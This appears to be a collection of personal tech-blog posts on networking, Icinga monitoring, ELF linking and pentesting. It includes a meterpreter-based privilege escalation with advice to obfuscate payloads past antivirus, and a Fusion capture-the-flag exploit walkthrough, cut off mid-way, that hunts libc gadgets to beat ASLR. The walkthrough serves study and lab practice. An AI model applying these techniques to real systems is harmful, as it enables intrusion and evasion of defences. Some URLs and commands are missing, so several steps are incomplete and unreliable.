Pentesting: Runas – How to elevate the same command prompt from user to admin in Windows


The search that’s more likely to bring you here might be something to the effect of: how to elevate the same command prompt from user to admin in Windows. For me, it was surprisingly annoying and I wasted a lot more time than I thought I would tracking down a solution to this particular problem.

It’s a deceptively simple task and the short answer to your question is: depending on the scenario, you can’t – but there are ways around it. As the title eludes, this is unfortunately not a post about how to elevate your privileges in the same command prompt legitimately, but how to do so in a pentesting scenario. (Although if you are a legit admin, you can set things up so you can do it with psexec.)


You are pentesting something and you can get command line access to a server as a user. You have administrative credentials, but you only have access to your one user shell and you want to elevate to administrator/system.

How to Do It

Fortunately, it’s pretty straight forward. First thing you have to do is get an a meterpreter shell running on the computer. You may run into AV and if that’s the case you’ll need to obfuscate your meterpreter somehow. Fortunately this is pretty easy to do, something like Veil will do the trick, but really any non-Metasploit crypto/obfuscation typically works. All the AV vendors have signatures for the built in Metasploit stuff so it tends to be fairly ineffective.

Once you have your meterpreter session running you can use a module called post/windows/manage/run_as. The options will look something like this:

CMD <YOUR_METERPRETER_PAYLOAD> yes Command to execute
CMDOUT false yes Retrieve command output
DOMAIN workgroup yes Domain to login with
PASSWORD <ADMIN_PASSWORD> yes Password to login with
SESSION <YOUR_USER_METERPRETER_SESSION> yes The session to run this module on.
USER <ADMIN_USERNAME> yes Username to login with

Where CMD could be anything you want to run as the administrator, but I typically just rerun my meterpreter payload to upgrade it to admin level and go from there.

How to: Unicode in URL with Python 3


I found this to be much more difficult than I thought it would be. The solution was simple, but finding it was a bit of a pain. Here is the solution:

from urllib.parse import quote
from urllib.request import urlopen

url_string = "http://your_site_here" + quote(SOME-STRING-WITH-UNICODE)
html = urlopen(url_string).read().decode('utf-8')

Extremely simple, but it caused me a fair amount of headache to figure that out.

Common errors that might bring you to this post:

AttributeError: ‘bytes’ object has no attribute ‘timeout’
TypeError: Can’t convert ‘bytes’ object to str implicitly
UnicodeEncodeError: ‘ascii’ codec can’t encode character ‘\xf3’ in position 6: ordinal not in range(128)
TypeError: a bytes-like object is required, not ‘str’
TypeError: expected bytes-like object, not str


Fixing asm: Internal error: unbalanced parenthesis in operand 1


I got this error the other day when I was trying to compile the exploit code for the mremap exploit on Linux. While I have programmed a lot I have not spent an inordinate amount of time with gcc and this was something of a pain to solve so I thought I would share a general solution.

1.) Begin by getting a dump of the assembly code. You can do this with gcc -S -o <name_of_output> <name_of_input>

2.) Go to the line the compiler told you there was an issue with. Now you can see what the problem is. In my case it was that the assembler came up with: movl $((17 which obviously has missing parenthesis.

3.) You can either directly modify the assembly, or trace it back to the root file. In my case, it was inline assembly and doing a search on the corresponding function name led me to the offending line: ” movl $(“xstr(CLONEFL)”), %%ebx \n”. It was a macro, which looked fine. However you can view preprocessor output with the -E option. Examining the preprocessor output led me to the line: ”               movl $(“”(17|0x00004000|0x00000100)””), %%ebx           \n”. I’m not sure why that doesn’t work, but I simply changed it to ”               movl $0x4111, %%ebx                     \n” and it worked.

Hope this saves someone some time. Feel free to comment if you have more specific questions.

Connect GNS3 to ESXi



As far as I can tell, there’s no great way to make this happen. I will explain, but to give you an image up front, below is a diagram of what I did. It may seem daunting at first, but I’ll explain as we go along.


Set Up Description

My GNS3 server is running on a VM on my ESXi host. In my case, I was running GNS3 on top of Ubuntu 15.10. My GNS3 server has four interfaces relevant to this problem. Interface eno16777984 connects from the VM to the default vSwitch0, which has access to the ESXi server’s one real network interface card. Interface eno33557248 connects to a second virtual switch I created, vSwitch1. This is the switch to which I connected the virtual machines I wanted to connect into my GNS3 topology. The interface tap1 is a loopback interface on the GNS3 server, which I used to connect into my GNS3 topology. Interface br0 bridges the tap1 interface to interface eno33557248. The bridge connects the virtual network created by vSwitch1 as bridged to my GNS3 topology.

Flow summary: VM hosted on ESXi -> vSwitch1 -> eno33557248 (GNS3 server)-> br0 (GNS3 server) -> tap1 (GNS3 server) -> GNS3 cloud

Apology: Sorry about the wonky interface names. Not sure why ESXi causes Ubuntu to generate such bizarre names.


The limitation of this solution is that you may have to implement it multiple times if you want to connect different ESXi VMs into different locations within your GNS3 topology. For example, vSwitch1 could be used to service all the DMZ machines in a GNS3 topology. However, if you want to plug the ESXi VMs into a different location, say at the access layer, you will need to set up another iteration of this solution in its totality.

Configure ESXi Server

  1. Select your ESXi server, go to configuration->Networking
  2. Click Add Networking, Virtual Machine, Create a vSphere standard switch, label it and put it in a VLAN – I used VLAN 2, click finish
  3. On your GNS3 server, add a virtual NIC which is connected to your newly created vSwitch
  4. On your newly created vSwitch go to properties, highlight your newly created network (the one you named – not the one that says vSwitch), click edit, go to security and then click the checkbox next to promiscuous mode and change the setting to accept. This setting is not ideal and this technique should not be used in production networks. It essentially turns the vSwitch into a hub. I didn’t delve into depth on the issue, but I noticed vSwitch does not handled bridge traffic properly. It will forward layer two traffic, but layer 3. This setting is required for the bridge we create later on to work. As best as I can tell, it looks like vSwitch doesn’t learn the MAC addresses from the other network. So it doesn’t forward destination traffic properly.


My final configuration looked like this:


Configure GNS3 Server Interfaces

This is the tricky part of the operation. Credit goes to knowosielski for his post here for illustrating how to connect an interface into the GNS3 topology.

Create a Virtual Interface

  1. Create a shell script with the following content and put it in your location of choice (i.e. /scripts/<SCRIPT NAME>)


#Set TAP1
tunctl -u husband

#Configure TAP1
ifconfig tap1 up

WARNING: Your tap interface may come up as tap0. That’s fine. When I set this up, I already had a tap0 so mine came up with tap1. If yours comes up as tap0, simply adjust the following steps accordingly.

  1. Modify the line “tunctl -u husband” and replace “husband” with your user name you want to have access to the interface.
  2. Save the script and make it executable with chmod +x <SCRIPT_NAME>
  3. Test the script by running it, then do an ifconfig and make sure tap1 is there. (Reminder, yours may come up as tap0, adjust steps accordingly if this is the case.)
  4. Modify “/etc/rc.local” to run this script every time the system starts. Add the line sudo <PATH_TO_SCRIPT>/<NAME_OF_SCRIPT> BEFORE the line exit 0. If you do not add the line before exit 0 it will not work. In mine I added the line sudo /home/husband/GNS3/script/tap
  5. Consider testing to make sure everything works by rebooting the system.

Create the Bridge Interface

  1. If you don’t already have them, run sudo apt-get install bridge-utils
  2. sudo vim /etc/network/interfaces add the line auto eno33557248 or whatever the name is of your VMs second interface. This should be the interface which resides in your newly created virtual ESXi virtual network which in my case was on vSwitch1.
  3. Now add the following lines:

# Bridge between tap1 and eno33557248
auto br0
iface br0 inet manual
bridge_ports tap1 eno33557248
bridge_stp off

  1. At this juncture, I strongly recommend you do a reboot and make sure that everything works at this point. If you skip this, troubleshooting down the line will probably be more challenging.

Configure GNS3

Now we’ll configure GNS3 itself. My setup was very simple for the sake of making sure everything works:


  1. In GNS3 click “Browse all devices” and drop the cloud into your topology
  2. Right click on the cloud and select configure
  3. Go to the tap tab, type tap1 (or whatever your tap interface is named), and click add


Now just drop a device in and connect it to the cloud and you should be up and running. I also tested this with the GNS3 ethernet switch and it worked fine. See screenshot below. This is a separate Ubuntu 15.10 server residing on my newly created ESXi vSwitch1, pinging through my GNS3 server and into the GNS3 topology.


This set up took me a really long time (especially that bit with promiscuous mode – that took forever to figure out). If you have any questions feel free to comment.

Receive SNMP Traps with Icinga 2 on Ubuntu/Debian


Configure Icinga2 to Receive SNMP Traps on Ubuntu/Debian


I’m warning you up front, making this happen is a pain if you’re new to Icinga. I did my best to account for every nuance I ran into, but you may find something else. Feel free to comment if you need help.


Unfortunately, there is no official way for Icinga to receive SNMP traps. However, there is a pseudo official hack everyone uses to make it happen. Icinga is not meant to be a replacement for full scale SNMP management suites however, it can do a pretty good job. I originally wrote this as a word document and moved it over so the indents on the numbering below may be slightly off, but it’s all in the correct order.

Flow Synopsis

We’ll use a couple of programs in conjunction to make this happen. The device will generate SNMP traps and send them to the SNMP server, which in our example resides on the same box as Icinga. We will use snmptrapd as our SNMP trap server. We will configure the snmptrapd service with an SNMP trap handler. When snmptrapd receives an SNMP trap, it will forward the trap to the SNMP trap handler. In our case, we will use snmptt as the handler. This tool translates SNMP traps from an SNMP OID (more information here) to a meaningful set of text which represents the trap. snmptt will use an executable statement to determine what to do for that trap. Each trap will have a configurable executable statement (you can use wildcards).

In order to get Icinga to receive the alert, our executable statements in snmptt will call an Icinga event handler. This event handler will report the SNMP trap to a running Icinga service, which is what you’ll actually be able to see in Icinga itself.

Set up the SNMP Trap Daemon

Recall, the SNMP trap daemon is responsible for receiving SNMP traps from the target host.

  1. Start by installing the daemon itself with sudo apt-get install snmpd
  2. Edit the configuration for snmptrapd by running the following commands:
    1. vim /etc/snmp/snmptrapd.conf
    2. Add the following two lines. The traphandle line tells snmptrapd to feed any traps it receives to the /usr/sbin/snmptthandler program, which is part of the snmptt suite of tools we will install next. disableAuthorization yes tells snmptrapd to not screen incoming SNMP traps. You could set up snmptrapd to only receive SNMP traps from certain devices if you wanted to.
      1. traphandle default /usr/sbin/snmptthandler
      2. disableAuthorization yes
    3. The snmptrapd service script does not run properly. I haven’t taken the time to troubleshoot it, but you can run snmptrapd with snmptrapd -On -Lsd -p /var/run/ and the program will run properly.

Configure SNMPTT

SNMPTT will take the trap from snmptrapd (the trap handler) and convert it to a meaningful message which we can send to Icinga.

  1. Steps 3-5 describe manual installation of SNMPTT. This is usually not necessary. If you are not manually installing, skip to step 6. Download SNMPTT. You can download it from the command line with wget The file will download with a strange name, but it works if renamed to <anything>.tgz. Alternatively, download form their home page here
  2. Run the following commands to install SNMPTT
    1. sudo cp snmptt snmptthandler /usr/sbin/
    2. sudo chmod +x /usr/sbin/snmptt /usr/sbin/snmptthandler
    3. sudo cp snmptt.ini /etc/snmp/
    4. sudo cp snmpttconvertmib /usr/sbin
    5. sudo groupadd snmptt
    6. sudo useradd -g snmptt snmptt
    7. sudo chown snmptt:snmptt /etc/snmp/snmptt.ini
    8. sudo mkdir /var/spool/snmptt
    9. sudo chown snmptt:snmptt /var/spool/snmptt/
    10. sudo vim /etc/snmp/snmptt.ini
      1. Change the line mode = standalone to mode=daemon
      2. If you want to change the DNS settings, change the line dns_enable = 0 to dns_enable = 1 and set strip_domain to 1
      3. Set syslog_enable to 0 if you do not have syslog set up
  1. Fix missing perl dependencies by running the following commands. SNMPTT ships with missing dependencies so they must be installed.
    1. sudo cpan install List::Util
    2. sudo cpan install Config::IniFiles
  2. Install SNMPTT by running the command sudo apt-get install snmptt
  3. Install the MIBs you would like to monitor
    1. sudo mkdir ~/.snmp
    2. sudo mkdir ~/.snmp/mibs The reason we created this folder is that we are going to use the snmptranslate tool to take the .my files we download and translate them into usable statements for the SNMPTT tool. The snmptranslate tool checks two directories for MIB files $HOME/.snmp/mibs and /usr/local/share/snmp/mibs.
    3. Download the .my files from the web. For my server, I used the Cisco MIB files, which can be downloaded from Change to the directory above and then run wget
      1. If using the files from Cisco, simply extract the archive and then move all the .my files from the extracted folder to ~/.snmp/mibs
    4. Create a script to convert all of the MIB files to usable SNMPTT data
      1. vim
      2. Add the following lines to the script. Where it says, <YOUR-SERVICE-NAME>, this is the name of the service, which Icinga will run to receive the SNMP traps. In my case, I named the service snmp_traps. The name can be anything. This script runs the snmpttconvertmib command on every .my file in a target folder.

for f in *.my
echo “Processing $f”
snmpttconvertmib –in=$f –out=/etc/snmp/snmptt.conf
–exec=’/usr/lib/nagios/plugins/submit_check_result_2 $r

  1. Save the following script as submit_check_result_2 in /usr/lib/Nagios/plugins/. This script is what the –exec line in the above script points to. The above script will modify snmptt.conf, which will contain a series of execution statements. These execution statements run anytime SNMPTT receives a trap, which matches the clause for the corresponding execution statement. The below script actually submits the trap to Icinga

# Written by Ethan Galstad (
# Last Modified: 26 Oct 15
# This script will write a command to the Nagios command
# file to cause Nagios to process a passive service check
# result.  Note: This script is intended to be run on the
# same host that is running Nagios.  If you want to
# submit passive check results from a remote machine, look
# at using the nsca addon.

# Arguments:
#  $1 = host_name (Short name of host that the service is
#       associated with)
#  $2 = svc_description (Description of the service)
#  $3 = return_code (An integer that determines the state
#       of the service check, 0=OK, 1=WARNING, 2=CRITICAL,
#       3=UNKNOWN).
#  $4 = plugin_output (A text string that should be used
#       as the plugin output for the service check)

# get the current date/time in seconds since UNIX epoch
datetime=`date +%s`
# create the command line to add to the command file
cmdline=”[$datetime] PROCESS_SERVICE_CHECK_RESULT;$1;$2;$3;$4″
# append the command to the end of the command file
`$echocmd $cmdline >> $CommandFile`

  1. Run the command sudo chmod +x /usr/lib/nagios/plugins/submit_check_result_2
  2. Navigate to ~/.snmp/mibs and run the snmptt-convert-script within the folder. The script will then process all the .my files in the directory. Some may fail and depending on which MIB you downloaded that’s fine. Not all entries will be processed. You can confirm the command ran successfully by checking the file /etc/snmp/snmptt.conf. The processed entries should appear there
  3. (Optional) Add a catchall definition by adding the following lines to your snmptt.conf file:

EVENT CatchAll .1.* “SNMP Traps” Critical
EXEC /usr/local/nagios/plugins/submit_check_result_2 “$r” “snmp_traps” 2 “$O: $1 $2 $3 $4 $5”

  1. Run SNMPTT with the command: sudo /usr/sbin/snmptt –daemon –debug=1 –debugfile=/var/log/snmptt.log Note: This is only necessary for manual installs or if you do not have it installed as a service. If you installed it via aptitude, go to step 10.
  2. Run SNMPTT with sudo service snmptt start

Configure Icinga 2 to Receive the Alerts

Icinga receives the alert from SNMPTT via the command file at /var/run/icinga2/cmd/icinga2.cmd. We will use a passive service to check this file for new SNMP traps and then Icinga will report them.

  1. Edit the Icinga2 template file at /etc/icinga2/conf.d/templates.conf with vim /etc/icinga2/conf.d/templates.conf
  2. Add the following template to the file:

template Service “snmp-trap-service” {
import “generic-service”
check_command         = “passive”
enable_notifications  = 1
enable_active_checks  = 1
enable_passive_checks = 1
enable_flapping       = 0
volatile              = 1
max_check_attempts    = 1
check_interval        = 87000
enable_perfdata       = 0
vars.sla              = “24×7”
vars.dummy_state      = 2
vars.dummy_text       = “No passive check result received.”

apply Service “snmp_traps” {
import “snmp-trap-service”
assign where host.address

  1. In the snmp_traps service apply statement, the configuration applies the snmp-trap-service to all Icinga provides more details here.
  2. This configuration only works if the host name configured for the hosts object is the same as the incoming SNMP trap host name. If the two do not match, Icinga will discard the trap. On my configuration my Cisco 1721 sent a host name of so my host name for my Icinga configuration had to be object Host “″ {

Icinga “ did not exit properly error”


I got this and it took some time to troubleshoot. The error is misleading. What it’s really telling you is that the plugin failed to execute properly. Here’s the catch, this includes warnings. So if you manually test the plugin from the command line outside of Icinga and it works, but gives a warning, when you run it with Icinga it will fail and throw the aforementioned error. To fix the problem, you have to fix whatever is in the code giving the warning.

Netint Plugin throws did not exit properly error

This was the specific problem I was having trouble with. I ran it on the command line and got some errors about an uninitialized variable. On line 2023  you’ll see a line with the variable $oid_perf_inoct. That is the offending variable. You need to add an additional if statement outside this one. Enclose the whole thing in an if block of

if (defined $oid_perf_inoct[$I]) {
//All that other stuff from the if block on line 2023

It worked for me after that.

Configuring Icinga for Cisco SNMP


Original Error: “CRITICAL – Plugin timed out while executing system call”

I had a bit of trouble getting this to work so I thought I would share my solution. I initially followed the tutorial here. I basically wanted to Icinga to receive SNMP data from a Cisco 7200 I had set up.

To begin, set up your Cisco router according to this tutorial.

You can then begin setting up your monitoring services according to the tutorial I listed above.

Here’s where it differs. I found that the line:

check_command check_snmp!-C public -o sysUpTime.0

did not work. I discovered you can test the plugins manually by migrating to your plugin directory and doing something like the following:

/usr/lib/nagios/plugins/check_snmp <COMMAND ARGUMENTS HERE>

In this way, if you want to try something new, you can run it manually first to see if it works.

I could not get a named identifier to work with the command so I ended up using the following in my config for Icinga:

check_command     check_snmp!-H <IP_ADDRESS_of_TARGET_HOST> -P 2c -C <COMMUNITY_STRING_HERE> -o .

The numbers at the end are the OID tree value corresponding to sysUpTime. You can view the tree here. You may notice there is an additional 0 at the end. This is the index number.


Stop Ubuntu 14.04 VPN From Dying

The title of my post is a bit misleading, but it’s my solution to the problem. I found that my VPN would randomly die on Ubuntu. I could ping the network internal, but everything external was dead. What I did was add a cron job which checks every minute if the interface is up and if it isn’t, restart the VPN.

Type: sudo crontab -e

Add the line:

* * * * * if !(grep -q <VPN_INTERFACE_NAME> /proc/net/dev); then nmcli con up id <VPN_NAME>; fi

You can check a list of your interface names with nmcli con. The line basically says, check if my VPN is in the list of available interfaces, if it isn’t bring it up.

Hope this helps.

What is the Symbol Table and What is the Global Offset Table?



When I first sought to understand the symbol table and the global offset table (GOT) I found bits and pieces of information, but I had trouble getting the whole picture. As I understood what the symbol table/GOT are, I realized it is easier to describe the symbol table/GOT in the context of the linking and loading process for which they are used. That’s what this post does. It will explain the why of the symbol table/GOT to help you understand them in context.

Most of the credit goes to the authors of the posts of which this one is an amalgamation of. This is more a collection of pieces of information to hopefully paint a clearer picture of the whole.

The Linking Process

If you aren’t already familiar with the C++ compilation process see this and this (they’re short :-D). You’ll need to understand that to understand this.

Relocation Records

Object files contain references to each other’s code and data. Due to this, the linker must combine them at link time. After linking all of the object files together, the linker uses the relocation records to find all of the addresses that need to be filled in.

The Symbol Table

Since assembling to machine code removes all traces of labels from the code, the object file format has to keep these around in a different place.  It does this in the form of the symbol table, a list of names and their corresponding offsets in the text and data segments. (Source)

To recap an important concept, an executable file is made up of several object files. You might have two object files and a c library that are all combined by the linker at link time into one executable file.

Shared Objects

Most systems run a number of programs at any given time. If you’re familiar with programming, it probably comes as no surprise to you that these programs each use many of the same libraries. For example, many programs use the standard C library which exports functions like printf and malloc. Naturally, we must then have a copy of the C library within the running memory of each of these programs. After all I said earlier that we combine object files and libraries to create executable files. However, this is a mammoth waste of resources so instead each program has a reference to this common library instead of each program having a copy of the library.

Static Linking vs Dynamic Linking

In a statically linked scenario a program and the particular library it is using are combined by the linker at link time. By contrast, a dynamically linked library (in Windows a .dll file and in Linux a .so file) is linked when the executable runs.

The linker binds statically linked libraries with the program at link time (which comes directly after compilation/assembly). The largest advantage of static linking is that you can be certain what version of the library is present. This means that DLL Hell/Depedency Hell isn’t a problem for statically linked executables. This also means the executable exists as a single file rather than several files. Additionally, statically linked executables only contain those parts of the library it needs to execute whereas dynamically linked libraries must load the entire library at runtime because it is not known in advance which functions the application will invoke.

On the downside, statically linked executables are much larger because they carry with them all of their library code. Additionally, in order to update the executable you must recompile/link it.

The term ‘dynamically linked’ means that the program and the particular library it references are not combined together by the linker at link time. Instead, the linker places information into the executable that tells the loader which shared object module the code is in and which runtime linker should be used to find and bind the references. (Source) This means that the linker finds the shared object and binds it to the executable and binds it at runtime. This type of program is also called a partially bound executable because it isn’t fully bound at link time. The linker did not resolve all the referenced symbols at link time. Instead the linker made a reference to the shared object and placed those in the executable. There are four main advantages to using dynamically linked executables.

  1. The executable is smaller
  2. Libraries may be upgraded or patched without having to relink all of the executables which depend on them. In the same vein, you don’t have to distribute the source code of the libraries – you only need the compiled binary version.
  3. Programmers must only deliver the unique libraries with their code. The programmer may assume that standard libraries will already be on the system.
  4. When combined with virtual memory, dynamic linking permits two or more processes to share read-only executables such as the standard C library or the kernel. This means memory must only retain one copy of the executable in memory rather than one for each process.

The Executable and Linkable Format (ELF) File Format

I’ll start by saying if you’re on Windows you’ll be using the PE/COFF file format. Most of the principles explained here conceptually port over to the PE/COFF format.

In order to fully understand shared objects, the symbol table and the GoT, you have to understand the ELF file format. The ELF specification defines the layout of an object file and its subsequent executable. It is the way we standardize the executables across systems, typically in the case of the ELF format, Linux systems. The ELF file format is fairly complicated and you can read about it in extreme detail here. In this post, I will settle for the parts relevant to the symbol table and the GoT.

Section vs Segment

Within the ELF format there are two ways to view the object file/executable, either the linking view or the execution view. Below is a diagram of the comparison



ELF uses the link view at static linking time for relocatable file combination and the execution view at run time to load and execute programs. The linking view by and large deals with sections whereas the execution view deals with segments. Sections provide the information needed at link time and segments the information needed at runtime.

Sections have a name and type, a requested memory location at run time, and permissions. You can locate the sections by examining the section header table. Each section has:

  • One section header describing it. Section headers may exist without a section.
  • Each section occupies one contiguous (possibly empty) sequence of bytes in a file.
  • Will not overlap
  • May have inactive space. The various headers and the sections might not cover every byte in an object file.

Segments group related sections. For example, the text segment groups executable code, the data segment groups the program data, and the dynamic segment groups information relevant to dynamic loading. Each section consists of one or more sections. In this post, we are primarily interested in the PT_DYNAMIC type segment.

Process Image and the Dynamic Linker

The process image is created by loading and interpreting the segments. When building an executable file that uses dynamic linking, the link editor adds a program header element of type PT_INTERP to an executable file, telling the system to invoke the dynamic linker as the program interpreter. The dynamic linker creates the process image for a program.  At link time, the program or library is built by merging together sections with similar attributes into segments. Typically, all the executable and read-only data sections are combined into a single text segment, while the data and BSS are combined into the data segment. These segments are normally called load segments, because they need to be loaded in memory at process creation. Other sections such as symbol information and debugging sections are merged into other, non-load segments. (Source)

Creating the process image entails the following activities (source):

  • Adding the executable file’s memory segments to the process image
  • Adding shared object memory segments to the process image
  • Performing relocations for the executable file and its shared objects
  • Closing the file descriptor that was used to read the executable file, if one was given to the dynamic linker
  • Transferring control to the program, making it look as if the program had received control directly form exec(BA_OS)

There are three sections we care about specifically in this post:

  • .dynamic: The structure residing at the beginning of the section holds the addresses of other dynamic linking information.
  • .got and .plt (procedure linkage table): .got stores the addresses of system functions and the .plt stores indirect links into the GoT

Shared objects may occupy virtual memory addresses that are different from the addresses recorded in the file’s program header table. The dynamic linker relocates the memory image, updating absolute addresses before the application gains control. Although the absolute address values would be correct if the library were loaded at the addresses specified in the program header table, this normally is not the case.

The Global Offset Table (GOT)

The GOT is a table of addresses which resides in the data section. If some instruction in code wants to refer to a variable it must normally use an absolute memory address. Instead of referring to the absolute memory address, it refers to the GOT, whose location is known. The relative location of the GOT from the instruction in question is constant.

Now you might be thinking, “Great, but I still have to resolve all those addresses within the GOT so what’s the point?” There are two things using the GOT gets us.

  1. We must relocate every reference in the code section. If everything references in the GOT we only must update the GOT once. This is much more efficient.
  2. The data section is both writable and not shared between processes. Performing relocations in this section causes no harm whereas in the code section relocations disallow sharing, which defeats the process of a shared library.

Here is an example I pulled from Eli Bendersky’s explanation:

In pseudo-assembly, we replace an absolute addressing instruction:

; Place the value of the variable in edx
mov edx, [ADDR_OF_VAR]

With displacement addressing from a register, along with an extra indirection:

; 1. Somehow get the address of the GOT into ebx
lea ebx, ADDR_OF_GOT

; 2. Suppose ADDR_OF_VAR is stored at offset 0x10
;    in the GOT. Then this will place ADDR_OF_VAR
;    into edx.
mov edx, DWORD PTR [ebx + 0x10]

; 3. Finally, access the variable and place its
;    value into edx.
mov edx, DWORD PTR [edx]

If you would like to see the rest of the process in a high level of detail I strongly suggest taking a look at Eli Bendersky’s under the section titled “PIC with data references through GOT – an example”

This is straightforward enough for global variables, but what about function calls? Theoretically, things could work the same way, but they’re actually a bit more complicated.

The Procedure Linkage Table (PLT)

The PLT is part of the executable text section, containing an entry for each external function the shared library calls. Each PLT entry is a short chunk of executable code. Instead of calling the function directly, the code calls an entry in the PLT, which then calls the actual function. Each entry in the PLT also has a corresponding entry in the GOT which contains the actual offset to the function, but only after the dynamic loader has resolved it.

The PLT uses what is called lazy resolution. It won’t actually resolve the address of a function until it absolutely has to. This makes it so effort is only put into resolving those functions actually used. The process works in the following manner:

  1. A function func is called and the compiler translates this to a call to func@plt.
  2. The program jumps to the PLT. The PLT points to the GOT. If the function hasn’t been previously called, the GOT points back into the PLT to a resolver routine, otherwise it points to the function itself.
  3. If the function hasn’t been previously called, the program jumps back from the GOT to the PLT, which then runs a resolver routine to update the GOT entry with actual address of the function.

The reason we use this lazy initialization is that it saves us the trouble of resolving all the functions that aren’t actually used during runtime.

Again, if you would like to see a specific example, I strongly recommend Eli Bendersky’s article. Look under the section “PIC with function calls through PLT and GOT – an example”

Other Sources


Fusion Exploit Challenges Level 01


Some GDB Housekeeping

When I first started this challenge, I was quite thrown off. I started debugging with GDB and my level00 exploit worked perfectly as is. In fact, after closer inspection I realized that none of the addresses from level00 were different in level01. I figured this wasn’t a coincidence. After running my exploit against the code outside of GDB and it not working I guessed what was going on – GDB disables ASLR to make debugging easier. My first step was to turn it back on so I could see what was going on.

set disable-randomization off

If you have a previously running level01 which you opened with gdb at any juncture before using the disable-randomization command you’ll need to kill that instance of level and open a new one. Once GDB opens a process it seems to rebase it.

Once I did that and reexamined the crash from level00 I saw that my return address took me to non-existent memory:

(gdb) c
[New process 15084]
[Switching to process 15084]

Breakpoint 1, 0x08049854 in fix_path (path=Cannot access memory at address 0x41414149
) at level01/level01.c:9
9 in level01/level01.c
(gdb) stepi
0xbffff3ec in ?? ()
(gdb) x/40x $eip
0xbffff3ec: Cannot access memory at address 0xbffff3ec

Poking Around

Our stack has indeed changed. Now we must find a way to make it to our shellcode. An examination of the stack pointer reveals the new location of our shellcode.

(gdb) x/300x $esp
0xbff0a7d0: 0xbff0a700 0x00000020 0x00000004 0x001761e4
0xbff0a7e0: 0x001761e4 0x000027d8 0x20544547 0x41414141
0xbff0a7f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a800: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a810: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a820: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a830: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a840: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a850: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a860: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a870: 0x41414141 0xec414141 0x00bffff3 0x50545448
0xbff0a880: 0x312e312f 0x43430a0d 0x43434343 0x43434343
0xbff0a890: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8d0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8e0: 0x43434343 0x43434343 0x43434343 0x43434343

In my case the 0x43s represent where the shellcode would sit. My next step was to examine the registers. The reason being, the challenge only enabled ASLR on stack, heap, and memmap. That means that everything else should still be static. If I can find a register that contains my shellcode I could potential find a gadget which jumps to that register to get to my shellcode.

(gdb) info registers
eax 0x1 1
ecx 0xb76b78d0 -1217693488
edx 0xbff0a7d0 -1074747440
ebx 0xb782fff4 -1216151564
esp 0xbff0a7d0 0xbff0a7d0
ebp 0x41414141 0x41414141
esi 0xbff0a884 -1074747260
edi 0x8049ed1 134520529
eip 0xbffff3ec 0xbffff3ec
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

Ah ha! There are several promising candidates from our lineup of registers. It looks like edx, esp, or esi could work. Additionally, we control the value of ebp so we could make use of it as well potentially. There are much fancier ways to do this, but I just used objdump to look for gadgets:

root@fusion:/opt/fusion/bin# objdump -D level01 | grep jmp

8049464: e9 3a ff ff ff jmp 80493a3 <serve_forever+0x14>
80495ff: eb 05 jmp 8049606 <is_restarted_process+0x53>
804962d: eb 44 jmp 8049673 <nread+0x66>
80496a0: eb 44 jmp 80496e6 <nwrite+0x66>
80497c9: eb 09 jmp 80497d4 <secure_srand+0xe1>
804983c: eb 15 jmp 8049853 <fix_path+0x3e>
8049a31: eb 0d jmp 8049a40 <__libc_csu_fini>
8049f0d: e9 ff ff d4 00 jmp 8d99f11 <_end+0xd4ea65>
8049f5f: ff 28 ljmp *(%eax)
8049f7f: ff ac 02 00 00 e2 f8 ljmp *-0x71e0000(%edx,%eax,1)
804a063: ff ab 00 00 00 00 ljmp *0x0(%ebx)
804a0cf: ff 6c 01 00 ljmp *0x0(%ecx,%eax,1)
804a1b7: ff ef ljmp *<internal disassembler error>
804a217: ff 25 01 00 00 00 jmp *0x1
804a25f: ff 61 00 jmp *0x0(%ecx)
804b302: ff 6f 8c ljmp *-0x74(%edi)
804b36a: ff 6f d4 ljmp *-0x2c(%edi)
804b372: ff 6f 01 ljmp *0x1(%edi)
804b37a: ff 6f 70 ljmp *0x70(%edi)
1b8f: ff 21 jmp *(%ecx)
230f: ff a5 8f 00 00 80 jmp *-0x7fffff71(%ebp)
254f: ff ee ljmp *<internal disassembler error>
27e3: ff ab 90 00 00 80 ljmp *-0x7fffff70(%ebx)

Glancing through this, none of those jmps are exactly what I’m looking for so I decided to kick up the fancy levels a bit. What about the shared libraries? Those should be loaded in static locations as well.

info sinfo sharedlibrary
From To Syms Read Shared Object Library
0xb76cebe0 0xb77db784 Yes /lib/i386-linux-gnu/
0xb7841830 0xb78585cf Yes (*) /lib/
(*): Shared library is missing debugging information.

Check that out. Libc is loaded into memory. I would find it very difficult to believe that libc doesn’t have what we’re looking for. After further examining the registers ESI is easily the most promising, but there is a small problem.

x/80x $esi
0xbff0a884: 0x43430a0d 0x43434343 0x43434343 0x43434343
0xbff0a894: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c4: 0x43434343 0x43434343 0x43434343 0x43434343

There are some garbage bits written at the beginning of the address space. So if we jump directly to ESI we’re going to immediately crash. So what we need is a jump to ESI at a short offset in. Again, given the size of libc, I’m guessing that won’t be hard to do.

objdump -D /lib/i386-linux-gnu/ | grep jmp | grep esi
1536cf:       ff 6e 06                ljmp   *0x6(%esi)

Indeed it was not. This should do exactly what we want. Now we need to figure out where libc was loaded:

(gdb) info proc mapping libc
process 15084
cmdline = ‘./level01’
cwd = ‘/’
exe = ‘/opt/fusion/bin/level01’
Mapped address spaces:

Start Addr End Addr Size Offset objfile
0x8048000 0x804b000 0x3000 0 /opt/fusion/bin/level01
0x804b000 0x804c000 0x1000 0x2000 /opt/fusion/bin/level01
0xb76b7000 0xb76b8000 0x1000 0
0xb76b8000 0xb782e000 0x176000 0 /lib/i386-linux-gnu/
0xb782e000 0xb7830000 0x2000 0x176000 /lib/i386-linux-gnu/
